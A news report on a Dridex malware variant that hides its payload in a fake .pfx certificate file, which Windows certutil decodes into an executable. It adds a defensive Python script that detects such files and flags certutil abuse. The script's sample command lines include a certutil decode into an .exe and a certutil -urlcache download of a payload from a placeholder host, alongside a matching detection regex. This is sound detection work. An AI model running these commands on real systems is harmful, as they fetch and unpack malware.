Custom Dridex malware disguises itself as a certificate
A new variant of the Dridex malware is mainly active in the United States after a brief period of inactivity. The malware, distributed via spam, disguises its payload as a certificate file to evade detection.
In a blog post, security firm Trend Micro describes the spam email, which masquerades as a notification that an unauthorized attempt to access an unspecified account has occurred. It also lists an IP address from which the attempt supposedly originated, to make the message look legitimate.
The email prompts the user to open a zip file to read a full report of the 'incident'. Once extracted, the archive contains an empty Word document, which asks the user to enable macros to view its contents. If the user does so, the infection takes place. Infection via macros is nothing new and is a common way of spreading malware.
According to Trend Micro, however, what is notable is that besides macros, a .pfx file is also used, which is dropped on the system when the zip archive is extracted. Files of this type (PKCS#12) normally hold public and private keys and are used to transfer certificates. Here the .pfx file is not a genuine certificate container: its contents are encrypted or encoded, and the built-in Windows tool certutil, normally used for certificate management, converts it into an executable (.exe) file, after which the infection takes place.
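As an added illustration (not code from Trend Micro or from the campaign itself), the following Python script shows two checks a defender can apply against this trick: it distinguishes a genuine PKCS#12 .pfx file (DER encoded, first byte 0x30) from a .pfx that is really a base64-encoded executable of the kind `certutil -decode` would restore, and it flags process command lines that use certutil's -decode, -decodehex, -encode or -urlcache switches rather than its certificate functions. The sample "certificate" and the command lines are constructed here; the assumption that the disguised file is base64 text follows from how certutil's -decode works, since the report only says the file is encrypted.

```python
import base64
import re
import struct

# Added illustration, not code from Trend Micro or from the Dridex campaign.
# The sample "pfx" below is constructed: a minimal PE skeleton wrapped the way
# a certutil-decodable file would be (assumption: base64 with PEM-style armour).


def looks_like_pe(data: bytes) -> bool:
    """True if data has a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def looks_like_pkcs12(data: bytes) -> bool:
    """A genuine .pfx/.p12 is DER encoded and starts with an ASN.1 SEQUENCE tag (0x30)."""
    return len(data) > 2 and data[0] == 0x30


def decode_certutil_style(text: str) -> bytes:
    """Mimic `certutil -decode`: drop -----BEGIN/END----- armour lines, base64-decode the rest."""
    body = "".join(line.strip() for line in text.splitlines()
                   if not line.strip().startswith("-----"))
    # validate=False discards whitespace and other non-alphabet characters, as certutil does
    return base64.b64decode(body, validate=False)


def classify_pfx(data: bytes) -> str:
    """Classify the bytes of a file carrying a .pfx extension: 'pkcs12', 'base64-pe' or 'other'."""
    if looks_like_pkcs12(data):
        return "pkcs12"
    try:
        decoded = decode_certutil_style(data.decode("ascii"))
    except ValueError:  # not ASCII, or not valid base64 (binascii.Error is a ValueError)
        return "other"
    return "base64-pe" if looks_like_pe(decoded) else "other"


# certutil invoked with a decoding/downloading switch instead of certificate management
CERTUTIL_ABUSE = re.compile(
    r"\bcertutil(?:\.exe)?\b.*?\s-(?:decode|decodehex|encode|urlcache)\b",
    re.IGNORECASE,
)


def suspicious_certutil(cmdline: str) -> bool:
    """Flag a process command line that uses certutil as a decoder or downloader."""
    return CERTUTIL_ABUSE.search(cmdline) is not None


def build_fake_pe() -> bytes:
    """Constructed minimal PE skeleton (not runnable code): DOS stub pointing at a PE signature."""
    buf = bytearray(0x44)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    buf[0x40:0x44] = b"PE\0\0"
    return bytes(buf)


def build_disguised_pfx() -> bytes:
    """Wrap the fake PE the way a certutil-decodable 'certificate' would look."""
    b64 = base64.b64encode(build_fake_pe()).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN CERTIFICATE-----\n" + "\n".join(lines)
            + "\n-----END CERTIFICATE-----\n").encode("ascii")


# Constructed sample command lines, as an EDR or Sysmon event 1 feed might show them.
SAMPLE_CMDLINES = [
    "certutil -decode report.pfx report.exe",
    'certutil.exe -urlcache -split -f http://example.invalid/payload.txt payload.txt',
    '"C:\\Windows\\System32\\certutil.exe" -verify cert.cer',
]


if __name__ == "__main__":
    print("disguised .pfx ->", classify_pfx(build_disguised_pfx()))
    print("real PKCS#12 header ->", classify_pfx(b"\x30\x82\x05\x00\x02\x01\x03"))
    for cmd in SAMPLE_CMDLINES:
        print(("SUSPICIOUS " if suspicious_certutil(cmd) else "ok         ") + cmd)
```

The file check is cheap enough to run on every .pfx extracted from mail attachments; the command-line rule is the complementary signal, since a legitimate certificate import never needs certutil's -decode switch pointed at a file that was just unpacked from a zip.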
The disguise as a .pfx file makes the malicious software harder to detect and block, Trend Micro writes. Dridex is mainly aimed at stealing financial information, such as login details for internet banking. According to the security firm, the use of .pfx files shows that the malware is still under active development.